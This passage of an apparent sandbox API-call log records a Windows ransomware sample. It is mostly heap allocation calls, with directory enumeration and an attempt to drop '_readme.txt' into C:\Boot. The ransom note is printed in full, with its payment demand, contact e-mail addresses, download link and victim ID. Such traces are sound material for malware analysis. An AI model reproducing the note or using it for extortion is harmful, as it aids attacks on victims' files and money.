RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.686] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0227.687] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.687] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.687] PathFindFileNameW (pszPath="") returned="" [0227.687] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.687] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.687] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.688] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.688] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0227.688] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0227.688] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.688] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.688] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.689] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.692] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.692] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.692] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.692] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.692] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 